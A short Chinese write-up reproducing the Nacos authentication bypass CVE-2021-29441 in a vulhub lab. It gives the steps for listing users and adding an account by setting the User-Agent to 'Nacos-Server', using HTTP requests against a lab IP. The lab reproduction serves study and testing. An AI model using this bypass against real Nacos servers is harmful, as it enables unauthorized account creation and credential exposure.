Nacos 未授权访问(CVE-2021-29441)

Nacos 未授权访问(CVE-2021-29441)

Nacos是阿里巴巴推出的一个新的开源项目。它是一个动态的服务发现、配置管理和服务管理平台,可以更轻松地构建云原生应用程序。致力于帮助发现、配置和管理微服务。Nacos 提供了一套简单易用的功能集,可以快速实现动态服务发现、服务配置、服务元数据和流量管理。
当 nacos 在执行身份验证和授权操作时确定请求的用户代理是否为“Nacos-Server”时,就会发生该漏洞,如果是,则不会执行任何身份验证。开发人员的初衷是处理一些服务器到服务器的请求。但是,由于配置过于简单,并且协商的用户代理设置为Nacos-Server,因此直接在代码中硬编码,从而导致出现漏洞。通过利用此未经授权的漏洞,攻击者可以获取用户名和密码等敏感信息
环境:vulhub

1.判断是否有此漏洞(可以查看用户列表)
修改user-agent为Nacos-Server
访问http://192.168.85.128:8848/nacos/v1/auth/users?pageNo=1&pageSize=9
查看状态码是否为200以及返回的内容是否含有
Nacos 未授权访问(CVE-2021-29441)_第1张图片
Nacos 未授权访问(CVE-2021-29441)_第2张图片
2.添加用户
修改user-agent为Nacos-Server
采用post方式访问
http://192.168.85.128:8848/nacos/v1/auth/users?username=vulhub&password=vulhub
3.使用添加的账号登陆
Nacos 未授权访问(CVE-2021-29441)_第3张图片

你可能感兴趣的:(中间件&框架漏洞复现,网络安全)